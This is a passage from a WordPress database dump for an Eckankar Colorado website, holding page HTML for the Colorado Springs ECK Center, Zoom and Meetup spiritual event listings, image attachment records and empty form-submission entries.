17:48:46','','','','publish','closed','closed','','261786','','','2020-08-28 11:48:46','2020-08-28 17:48:46','',0,'https://eckankar-colorado.org/nf_sub/261786/',0,'nf_sub','',0),(261826,2,'2020-09-02 14:42:08','2020-09-02 20:42:08','','eck-temple-new-2020-3','','inherit','closed','closed','','eck-temple-new-2020-3','','','2020-09-02 14:42:08','2020-09-02 20:42:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/09/eck-temple-new-2020-3.jpg',0,'attachment','image/jpeg',0),(261839,2,'2020-09-02 14:54:12','2020-09-02 20:54:12','','temple-cloud-bk-1','','inherit','closed','closed','','temple-cloud-bk-1','','','2020-09-02 14:54:12','2020-09-02 20:54:12','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/09/temple-cloud-bk-1.jpg',0,'attachment','image/jpeg',0),(261841,0,'2020-09-05 13:20:48','2020-09-05 19:20:48','','','','publish','closed','closed','','261841','','','2020-09-05 13:20:48','2020-09-05 19:20:48','',0,'https://eckankar-colorado.org/nf_sub/261841/',0,'nf_sub','',0),(261847,0,'2020-09-08 08:19:32','2020-09-08 14:19:32','','','','publish','closed','closed','','261847','','','2020-09-08 08:19:32','2020-09-08 14:19:32','',0,'https://eckankar-colorado.org/nf_sub/261847/',0,'nf_sub','',0),(261866,2,'2020-09-08 10:52:51','2020-09-08 16:52:51','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 36px; padding-bottom: 14px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 14px; padding-bottom: 10px; background-color: #f2f3f4; border-width: 0px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 col-lg-6\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 31px; text-align: left; margin-top: 11px; font-weight: 600; margin-bottom: 0px; border-width: 0px; color: #1d5791; font-family: \'Raleway\';\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Colorado Springs ECK Center</h1>\r\n<h4 class=\"\" style=\"font-size: 19px; line-height: 14px; border-width: 0px; font-family: \'Open Sans\'; margin-top: 25px; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Open Sans\" data-font-weight=\"600\">Master your spiritual destiny.</h4>\r\n<p class=\"\" style=\"font-size: 18px; line-height: 23px; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Find love, happiness, and balance in life.</p>\r\n<h2 class=\"\" style=\"font-size: 19px; text-transform: capitalize; font-family: Open Sans; font-weight: 400; line-height: 19px; border-width: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Phone:</strong> 719-633-0453</h2>\r\n<h2 class=\"\" style=\"font-size: 19px; text-transform: capitalize; line-height: 30px; font-family: \'Open Sans\'; font-weight: 400; margin-bottom: 10px; border-width: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>ECK Center Hours:<br>\r\n</strong><em>Open during in-person events</em></h2>\r\n<p class=\"\" style=\"margin-top: 36px; border-width: 0px;\"><a class=\"btn btn-color-1 btn-rounded btn-raised\" style=\"font-size: 17px; border-width: 0px; padding-left: 10px; padding-right: 10px;\" href=\"https://eckankar-colorado.org/colorado-springs-public-calendar-mec/\">Check The Colorado Springs Event Calendar</a></p>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 col-lg-6\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"margin-top: 11px;\"><img class=\"bg-img bg-img-rounded-bottom-right bg-img-rounded-top-left aligncenter wp-image-268313 size-full\" style=\"box-shadow: #bfbfbf 10px 10px 3px -3px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/co-springs-location-2023-v5.jpg\" alt=\"\" width=\"554\" height=\"323\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-contact-5 boldgrid-section dynamic-gridblock color1-background-color color-1-text-contrast bg-background-color\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 14px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 bg-box-flush col-lg-12\">\r\n<p class=\"boldgrid-google-maps\" style=\"margin: 0px auto;\"><br>\r\n<iframe style=\"width: 100%;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3104.8541363866884!2d-104.86698958492248!3d38.904450779569494!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x871351cba3f0e41d%3A0x53cb1a5deb6da67c!2s5040%20Corporate%20Plaza%20Dr%20%235%2C%20Colorado%20Springs%2C%20CO%2080919!5e0!3m2!1sen!2sus!4v1680642278048!5m2!1sen!2sus\" width=\"2000\" height=\"325\" frameborder=\"0\"></iframe></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\"></div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px; border-width: 0px; background-color: #f2f3f4;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\" style=\"border-width: 0px;\">\r\n<h2 class=\"\" style=\"border-width: 0px; text-transform: none; color: #1d5791; text-align: center; font-size: 25px; font-family: \'Open Sans\'; font-weight: 400; margin-bottom: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">For information or to have a Colorado Springs representative<br>\r\ncontact you, just fill out the form below.</h2>\r\n<div class=\"row bg-editor-hr-wrap\" style=\"border-width: 0px; margin-top: -15px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<hr class=\"bg-hr-2 bg-hr\" style=\"margin: 12px auto 18px; color: #23507d; padding: 0px; width: 60%;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"text-align: center;\">[ninja_form id=35]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Colorado Springs Area','','publish','closed','closed','','colorado-springs-area','','','2023-04-05 10:32:42','2023-04-05 16:32:42','',0,'https://eckankar-colorado.org/?page_id=261866',0,'page','',0),(261867,2,'2020-09-08 10:47:13','2020-09-08 16:47:13','','cosprings-area-splash-1','','inherit','closed','closed','','cosprings-area-splash-1','','','2020-09-08 10:47:13','2020-09-08 16:47:13','',261866,'https://eckankar-colorado.org/wp-content/uploads/2020/09/cosprings-area-splash-1.jpg',0,'attachment','image/jpeg',0),(261877,2,'2020-09-08 11:51:39','2020-09-08 17:51:39','<p>[ninja_form id=35]</p>','Colorado Springs Area Contact Form','','publish','closed','closed','','colorado-springs-area-contact-form','','','2020-09-08 11:51:39','2020-09-08 17:51:39','',0,'https://eckankar-colorado.org/?post_type=popup&#038;p=261877',0,'popup','',0),(261902,2,'2020-09-08 12:46:51','2020-09-08 18:46:51','','','','publish','closed','closed','','261902','','','2020-09-08 12:46:51','2020-09-08 18:46:51','',0,'https://eckankar-colorado.org/nf_sub/261902/',0,'nf_sub','',0),(261908,2,'2020-09-08 13:26:52','2020-09-08 19:26:52','','','','publish','closed','closed','','261908','','','2020-09-08 13:26:52','2020-09-08 19:26:52','',0,'https://eckankar-colorado.org/nf_sub/261908/',0,'nf_sub','',0),(261909,2,'2020-09-08 13:49:56','2020-09-08 19:49:56','','','','publish','closed','closed','','261909','','','2020-09-08 13:49:56','2020-09-08 19:49:56','',0,'https://eckankar-colorado.org/nf_sub/261909/',0,'nf_sub','',0),(261911,2,'2020-09-08 14:02:00','2020-09-08 20:02:00','','','','publish','closed','closed','','261911','','','2020-09-08 14:02:00','2020-09-08 20:02:00','',0,'https://eckankar-colorado.org/nf_sub/261911/',0,'nf_sub','',0),(261913,2,'2020-09-08 14:16:02','2020-09-08 20:16:02','','','','publish','closed','closed','','261913','','','2020-09-08 14:16:02','2020-09-08 20:16:02','',0,'https://eckankar-colorado.org/nf_sub/261913/',0,'nf_sub','',0),(261914,2,'2020-09-08 14:27:43','2020-09-08 20:27:43','','','','publish','closed','closed','','261914','','','2020-09-08 14:27:43','2020-09-08 20:27:43','',0,'https://eckankar-colorado.org/nf_sub/261914/',0,'nf_sub','',0),(261921,2,'2023-10-20 09:43:11','2020-09-08 20:57:42','','Colorado Springs ECK Center','','publish','closed','closed','','261921','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=261921',13,'nav_menu_item','',0),(261933,2,'2020-09-10 09:59:14','0000-00-00 00:00:00','<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 100px; padding-bottom: 100px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"text-align: center; color: #23507d; font-size: 31px; font-family: Open Sans; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Thank You For Registering!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 21px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">We appreciate you taking the time to complete your 2020 Satsang Class registration.<br>\r\nThe Arahata for the class you have chosen will be contacting you soon.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Satsang Class Registration Thank You Page --- working DRAFT ONLY','','draft','closed','closed','','','','','2020-09-10 09:59:14','2020-09-10 15:59:14','',0,'https://eckankar-colorado.org/?page_id=261933',0,'page','',0),(261992,2,'2020-09-13 09:29:09','2020-09-13 15:29:09','','satsang-bk-1','','inherit','closed','closed','','satsang-bk-1','','','2020-09-13 09:29:09','2020-09-13 15:29:09','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/09/satsang-bk-1.jpg',0,'attachment','image/jpeg',0),(262024,2,'2020-09-14 11:05:56','2020-09-14 17:05:56','','satsang-promo-bk-3','','inherit','closed','closed','','satsang-promo-bk-3','','','2020-09-14 11:05:56','2020-09-14 17:05:56','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/09/satsang-promo-bk-3.jpg',0,'attachment','image/jpeg',0),(262061,0,'2020-09-22 20:41:47','2020-09-23 02:41:47','','','','publish','closed','closed','','262061','','','2020-09-22 20:41:47','2020-09-23 02:41:47','',0,'https://eckankar-colorado.org/nf_sub/262061/',0,'nf_sub','',0),(262062,0,'2020-09-22 20:45:58','2020-09-23 02:45:58','','','','publish','closed','closed','','262062','','','2020-09-22 20:45:58','2020-09-23 02:45:58','',0,'https://eckankar-colorado.org/nf_sub/262062/',0,'nf_sub','',0),(262063,0,'2020-09-23 16:12:11','2020-09-23 22:12:11','','','','publish','closed','closed','','262063','','','2020-09-23 16:12:11','2020-09-23 22:12:11','',0,'https://eckankar-colorado.org/nf_sub/262063/',0,'nf_sub','',0),(262066,2,'2020-12-01 12:35:25','2020-12-01 19:35:25','<p><span style=\"color: #f28a27;\"><span style=\"font-size: 16pt;\">“TBA”</span></span></p>\r\n<p>The ECK Light and Sound Service is a community event offered by Eckankar for spiritual seekers of all faiths and religious backgrounds. It is an uplifting event where you can reflect on and connect with the divine aspect within yourself. You will hear inspiring spiritual stories, experience the HU chant, and be able to speak with other like-hearted spiritual seekers.</p>\r\n<p>You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</p>','ZOOM VIRTUAL EVENT - ECK Light & Sound Service','','publish','closed','closed','','eck-light-sound-service-virtual-event','','','2020-12-04 10:19:51','2020-12-04 17:19:51','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262066',0,'tribe_events','',0),(262070,2,'2020-09-26 14:46:08','2020-09-26 20:46:08','<!-- EVENT #1 -->\r\n<p><span style=\"color: #f28a27; font-size: 18pt;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"color: #666666; font-size: 12pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #666666; font-size: 12pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666; font-size: 12pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<!-- EVENT #2 -->','ZOOM VIRTUAL EVENT - Experience the Sound Of Soul - Register Now!','','publish','closed','closed','','virtual-event-experience-the-sound-of-soul','','','2020-12-28 13:03:55','2020-12-28 20:03:55','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262070',0,'tribe_events','',0),(262101,0,'2020-09-29 08:16:32','2020-09-29 14:16:32','','','','publish','closed','closed','','262101','','','2020-09-29 08:16:32','2020-09-29 14:16:32','',0,'https://eckankar-colorado.org/nf_sub/262101/',0,'nf_sub','',0),(262102,2,'2023-03-18 11:50:10','0000-00-00 00:00:00','<div class=\"tmpl-blog-13 boldgrid-section dynamic-gridblock color1-background-color color-1-text-contrast bg-background-color\" style=\"background-color: #97d4f3;\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 50px;\">\n<div class=\"col-md-4 col-sm-12 col-xs-12 col-lg-4\">\n<h2 class=\"\" style=\"font-family: Raleway; font-weight: 400; text-transform: capitalize; font-size: 39px; color: #09399f; margin-bottom: -13px; border-width: 0px;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">Online ECKANKAR Soul Adventure Seminar!</h2>\n<div class=\"row bg-editor-hr-wrap\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<div>\n<hr class=\"bg-hr\" style=\"border: 2px solid; margin-bottom: 25px; margin-left: 0px; color: #09399f;\" width=\"50%\"></div>\n</div>\n</div>\n<p class=\"\" style=\"font-size: 16px; font-family: Open Sans; font-weight: 400; margin-top: -17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A Soul adventure can touch you at the very core of your being. As Soul, you have the God knowledge within you. A Soul adventure awakens you to the love, wisdom, and creativity already within your heart!</p>\n<p class=\"\" style=\"font-size: 16px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Gifts of spiritual growth await you as you enter this new online portal. It is both a personal, spiritual adventure and a connection with the global ECK community!</p>\n<p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">New to ECKANKAR? Enjoy complimentary registration.</p>\n<p class=\"\"><a class=\"btn btn-rounded btn-color-1 btn-raised\" href=\"https://www.ecksouladventure.org/\">Learn More and Register!</a></p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">&nbsp;</p>\n</div>\n<div class=\"col-md-8 col-sm-12 col-xs-12 col-lg-8\" style=\"padding-right: 0em; padding-left: 0em;\">\n<div class=\"bg-box\">\n<p class=\"\" style=\"margin-bottom: 25px;\"><img class=\"bg-img alignnone wp-image-262115 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/09/2020-Soul-Adventure-3.jpg\" alt=\"\" width=\"752\" height=\"376\"></p>\n<blockquote class=\"color2-color bg-blockquote\" style=\"border-color: #09399f;\">\n<p class=\"\" style=\"color: #4c4747; font-size: 16px;\">“One who is thankful for every good thing will find the richness of heaven in the humblest detail of his spiritual life. The window of gratitude opens to us the heavens of God.”</p>\n<p class=\"\" style=\"color: #4c4747; font-size: 14px;\">—Sri Harold Klemp, the Mahanta, the Living ECK Master</p>\n</blockquote>\n</div>\n</div>\n</div>\n</div>\n</div>','2020 ADVENTURE SEMINAR TEST','','draft','closed','closed','','','','','2023-03-18 11:50:10','2023-03-18 17:50:10','',0,'https://eckankar-colorado.org/?page_id=262102',0,'page','',0),(262133,2,'2020-09-29 15:32:43','2020-09-29 21:32:43','','Content Only - For use with page builders or block editor','','publish','closed','closed','','content-only','','','2020-09-29 15:32:43','2020-09-29 21:32:43','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=262133',0,'popup_theme','',0),(262134,2,'2020-09-29 15:32:44','2020-09-29 21:32:44','','Content Only - For use with page builders or block editor','','publish','closed','closed','','content-only-2','','','2020-09-29 15:32:44','2020-09-29 21:32:44','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=262134',0,'popup_theme','',0),(262135,0,'2020-09-29 15:32:47','2020-09-29 21:32:47','','Content Only - For use with page builders or block editor','','publish','closed','closed','','content-only-3','','','2020-09-29 15:32:47','2020-09-29 21:32:47','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=262135',0,'popup_theme','',0),(262137,0,'2020-09-30 16:23:40','2020-09-30 22:23:40','','','','publish','closed','closed','','262137','','','2020-09-30 16:23:40','2020-09-30 22:23:40','',0,'https://eckankar-colorado.org/nf_sub/262137/',0,'nf_sub','',0),(262151,0,'2020-10-07 16:44:41','2020-10-07 22:44:41','','','','publish','closed','closed','','262151','','','2020-10-07 16:44:41','2020-10-07 22:44:41','',0,'https://eckankar-colorado.org/nf_sub/262151/',0,'nf_sub','',0),(262167,0,'2020-10-14 13:10:48','2020-10-14 19:10:48','','','','publish','closed','closed','','262167','','','2020-10-14 13:10:48','2020-10-14 19:10:48','',0,'https://eckankar-colorado.org/nf_sub/262167/',0,'nf_sub','',0),(262168,0,'2020-10-14 13:14:55','2020-10-14 19:14:55','','','','publish','closed','closed','','262168','','','2020-10-14 13:14:55','2020-10-14 19:14:55','',0,'https://eckankar-colorado.org/nf_sub/262168/',0,'nf_sub','',0),(262182,0,'2020-10-17 21:15:14','2020-10-18 03:15:14','','','','publish','closed','closed','','262182','','','2020-10-17 21:15:14','2020-10-18 03:15:14','',0,'https://eckankar-colorado.org/nf_sub/262182/',0,'nf_sub','',0),(262231,2,'2020-10-21 15:59:50','2020-10-21 21:59:50','','OLYMPUS DIGITAL CAMERA','OLYMPUS DIGITAL CAMERA','inherit','closed','closed','','olympus-digital-camera-2','','','2020-10-21 15:59:50','2020-10-21 21:59:50','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/10/loveland-center-10-21-2020.jpg',0,'attachment','image/jpeg',0),(262236,0,'2020-10-21 18:27:21','2020-10-22 00:27:21','','','','publish','closed','closed','','262236','','','2020-10-21 18:27:21','2020-10-22 00:27:21','',0,'https://eckankar-colorado.org/nf_sub/262236/',0,'nf_sub','',0),(262250,0,'2020-10-24 08:57:41','2020-10-24 14:57:41','','','','publish','closed','closed','','262250','','','2020-10-24 08:57:41','2020-10-24 14:57:41','',0,'https://eckankar-colorado.org/nf_sub/262250/',0,'nf_sub','',0),(262251,2,'2020-10-24 10:49:27','2020-10-24 16:49:27','','eck-on-vimeo-1','','inherit','closed','closed','','eck-on-vimeo-1','','','2020-10-24 10:49:27','2020-10-24 16:49:27','',7160,'https://eckankar-colorado.org/wp-content/uploads/2020/10/eck-on-vimeo-1.png',0,'attachment','image/png',0),(262256,2,'2020-10-25 10:08:20','2020-10-25 16:08:20','','hero-stitched-2','','inherit','closed','closed','','hero-stitched-2','','','2020-10-25 10:08:20','2020-10-25 16:08:20','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/10/hero-stitched-2.jpg',0,'attachment','image/jpeg',0),(262259,2,'2020-10-26 14:18:51','2020-10-26 20:18:51','','welcome-ocean-1','','inherit','closed','closed','','welcome-ocean-1','','','2020-10-26 14:18:51','2020-10-26 20:18:51','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/10/welcome-ocean-1.jpg',0,'attachment','image/jpeg',0),(262262,0,'2020-10-27 11:26:41','2020-10-27 17:26:41','','','','publish','closed','closed','','262262','','','2020-10-27 11:26:41','2020-10-27 17:26:41','',0,'https://eckankar-colorado.org/nf_sub/262262/',0,'nf_sub','',0),(262268,0,'2020-10-29 20:56:17','2020-10-30 02:56:17','','','','publish','closed','closed','','262268','','','2020-10-29 20:56:17','2020-10-30 02:56:17','',0,'https://eckankar-colorado.org/nf_sub/262268/',0,'nf_sub','',0),(262272,0,'2020-11-03 15:38:28','2020-11-03 22:38:28','','','','publish','closed','closed','','262272','','','2020-11-03 15:38:28','2020-11-03 22:38:28','',0,'https://eckankar-colorado.org/nf_sub/262272/',0,'nf_sub','',0),(262274,0,'2020-11-07 08:24:18','2020-11-07 15:24:18','','','','publish','closed','closed','','262274','','','2020-11-07 08:24:18','2020-11-07 15:24:18','',0,'https://eckankar-colorado.org/nf_sub/262274/',0,'nf_sub','',0),(262278,0,'2020-11-08 11:37:13','2020-11-08 18:37:13','','','','publish','closed','closed','','262278','','','2020-11-08 11:37:13','2020-11-08 18:37:13','',0,'https://eckankar-colorado.org/nf_sub/262278/',0,'nf_sub','',0),(262280,0,'2020-11-09 00:30:00','2020-11-09 07:30:00','','','','publish','closed','closed','','262280','','','2020-11-09 00:30:00','2020-11-09 07:30:00','',0,'https://eckankar-colorado.org/nf_sub/262280/',0,'nf_sub','',0),(262284,0,'2020-11-11 12:42:36','2020-11-11 19:42:36','','','','publish','closed','closed','','262284','','','2020-11-11 12:42:36','2020-11-11 19:42:36','',0,'https://eckankar-colorado.org/nf_sub/262284/',0,'nf_sub','',0),(262285,0,'2020-11-11 12:45:34','2020-11-11 19:45:34','','','','publish','closed','closed','','262285','','','2020-11-11 12:45:34','2020-11-11 19:45:34','',0,'https://eckankar-colorado.org/nf_sub/262285/',0,'nf_sub','',0),(262286,0,'2020-11-11 19:49:47','2020-11-12 02:49:47','','','','publish','closed','closed','','262286','','','2020-11-11 19:49:47','2020-11-12 02:49:47','',0,'https://eckankar-colorado.org/nf_sub/262286/',0,'nf_sub','',0),(262290,0,'2020-11-14 18:26:04','2020-11-15 01:26:04','','','','publish','closed','closed','','262290','','','2020-11-14 18:26:04','2020-11-15 01:26:04','',0,'https://eckankar-colorado.org/nf_sub/262290/',0,'nf_sub','',0),(262297,0,'2020-11-24 15:14:03','2020-11-24 22:14:03','','','','publish','closed','closed','','262297','','','2020-11-24 15:14:03','2020-11-24 22:14:03','',0,'https://eckankar-colorado.org/nf_sub/262297/',0,'nf_sub','',0),(262303,0,'2020-12-01 03:39:45','2020-12-01 10:39:45','','','','publish','closed','closed','','262303','','','2020-12-01 03:39:45','2020-12-01 10:39:45','',0,'https://eckankar-colorado.org/nf_sub/262303/',0,'nf_sub','',0),(262305,2,'2020-12-01 12:05:06','2020-12-01 19:05:06','','Virtual Zoom Event','','publish','closed','closed','','virtual-zoom-event','','','2020-12-01 12:05:06','2020-12-01 19:05:06','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=262305',0,'tribe_venue','',0),(262315,2,'2020-12-01 14:21:42','2020-12-01 21:21:42','','email-img-registration-600-3','','inherit','closed','closed','','email-img-registration-600-3','','','2022-04-03 09:31:13','2022-04-03 15:31:13','',266474,'https://eckankar-colorado.org/wp-content/uploads/2020/12/email-img-registration-600-3.jpg',0,'attachment','image/jpeg',0),(262345,2,'2020-12-02 11:27:32','2020-12-02 18:27:32','','eck-event-2','','inherit','closed','closed','','eck-event-2','','','2020-12-02 11:27:32','2020-12-02 18:27:32','',7160,'https://eckankar-colorado.org/wp-content/uploads/2020/12/eck-event-2.png',0,'attachment','image/png',0),(262422,2,'2020-12-03 09:50:50','2020-12-03 16:50:50','<p><span style=\"font-size: 20pt; color: #f28a27;\">Welcome to the Soul Adventures Series!</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>Please join us for the second of three online Soul Adventures Meetups, sponsored by Eckankar - The Path of Spiritual Freedom – in Colorado.</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Spiritual experiences touch us at the very core of our being – Soul, the eternal, unique, divine spark of God who we really are. This series will help you to set out on your own Soul Adventures, by learning to recognize your spiritual experiences, benefit from them in your daily life, and awaken to more of the love, wisdom, and creative powers that are already within your heart.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The three sessions will take place via Zoom on the following THREE Saturdays, from 10:30-11:45 am:</span></p>\r\n<ol>\r\n	<li> <span style=\"font-size: 12pt;\">Spiritual Stress Relief -Techniques and Inspiration to Survive and Thrive (Saturday, 11/21/20, 10:30-11:45 am)</span></li>\r\n	<li> <span style=\"font-size: 12pt;\">Dreams and their Spiritual Significance - A Doorway to Inner Truth (Saturday, 12/5/20, 10:30-11:45 am)</span></li>\r\n	<li> <span style=\"font-size: 12pt;\">Embarking on Your Own Soul Adventures (Saturday, 12/19/20, 10:30-11:45 am)</span></li>\r\n</ol>\r\n<p><br />\r\n<span style=\"font-size: 12pt;\">The Zoom meeting links for each Meetup will be provided to those who RSVP that they are attending.</span><br />\r\n<br />\r\n<strong><span style=\"font-size: 12pt;\">Second Session: Dreams and their Spiritual Meaning – A Doorway to Inner Truth</span></strong><br />\r\n<span style=\"font-size: 12pt;\">“Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.” Harold Klemp, the Art of Spiritual Dreaming</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Dreams are real! They are a way to tap into higher perspectives on what matters to you today. In this Meetup, we will discuss how to awaken to your dreams, remember them more effectively, explore their spiritual meaning, and benefit from them in your daily life.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This Meetup is based on this webpage: <a class=\"link\" title=\"https://www.eckankar.org/experience/dreams/.\" href=\"https://www.eckankar.org/experience/dreams/\" target=\"__blank\" rel=\"noopener noreferrer\">https://www.eckankar.org/experience/dreams/.</a> Please feel free to review the page before the Meetup and explore the tools provided there for remembering, interpreting, and benefiting from your dreams. Bring your questions, comments, and experiences to discuss during the Meetup!</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/274548546/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT - Soul Adventures Series: Dreams and Their Spiritual Meaning','','publish','closed','closed','','meetup-virtual-event-soul-adventures-series-dreams-and-their-spiritual-meaning','','','2020-12-28 13:03:36','2020-12-28 20:03:36','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262422',0,'tribe_events','',0),(262424,2,'2020-12-03 09:29:45','2020-12-03 16:29:45','','kayak-to-other-worlds','','inherit','closed','closed','','kayak-to-other-worlds','','','2020-12-03 09:29:45','2020-12-03 16:29:45','',262422,'https://eckankar-colorado.org/wp-content/uploads/2020/12/kayak-to-other-worlds.jpg',0,'attachment','image/jpeg',0),(262433,2,'2020-12-03 10:21:08','2020-12-03 17:21:08','<p><span style=\"font-size: 20pt; color: #f28a27;\">Welcome to the Soul Adventures Series!</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>Please join us for the second of three online Soul Adventures Meetups, sponsored by Eckankar - The Path of Spiritual Freedom – in Colorado.</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Spiritual experiences touch us at the very core of our being – Soul, the eternal, unique, divine spark of God who we really are. This series will help you to set out on your own Soul Adventures, by learning to recognize your spiritual experiences, benefit from them in your daily life, and awaken to more of the love, wisdom, and creative powers that are already within your heart.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The three sessions will take place via Zoom on the following THREE Saturdays, from 10:30-11:45 am:</span></p>\r\n<ol>\r\n	<li> <span style=\"font-size: 12pt;\">Spiritual Stress Relief -Techniques and Inspiration to Survive and Thrive (Saturday, 11/21/20, 10:30-11:45 am)</span></li>\r\n	<li> <span style=\"font-size: 12pt;\">Dreams and their Spiritual Significance - A Doorway to Inner Truth (Saturday, 12/5/20, 10:30-11:45 am)</span></li>\r\n	<li> <span style=\"font-size: 12pt;\">Embarking on Your Own Soul Adventures (Saturday, 12/19/20, 10:30-11:45 am)</span></li>\r\n</ol>\r\n<p><br />\r\n<span style=\"font-size: 12pt;\">The Zoom meeting links for each Meetup will be provided to those who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\"><strong>Third Session: 3. Embarking on Your Own Soul Adventures</strong><br />\r\n“If you are a sincere seeker of truth, you realize that something within you is constantly pushing you from the nest. You know the answers you seek do exist somewhere in the world. This inner force that pushes you to find the answers is an urge you have no control over. You have heard the call of Soul and set off in pursuit of God.” Harold Klemp, The Call of Soul<br />\r\n<br />\r\nYou are Soul – an eternal, unique, divine spark of God. Soul adventures, or becoming more aware of your spiritual experiences, can awaken you to more of the love, wisdom, and creative powers that are already within your heart. In this Meetup, we will explore the many ways to get divine help in your daily life, recognize your own spiritual experiences, and embark on your own Soul Adventures.<br />\r\n<br />\r\nBased on this web page: <a class=\"link\" title=\"https://www.eckankar.org/soul-adventure/.\" href=\"https://www.eckankar.org/soul-adventure/\" target=\"__blank\" rel=\"noopener noreferrer\">https://www.eckankar.org/soul-adventure/.</a> Please feel free to browse the page before the Meetup and explore the many paths there to start your new Soul adventures. Bring your questions, comments, and experiences to discuss during the 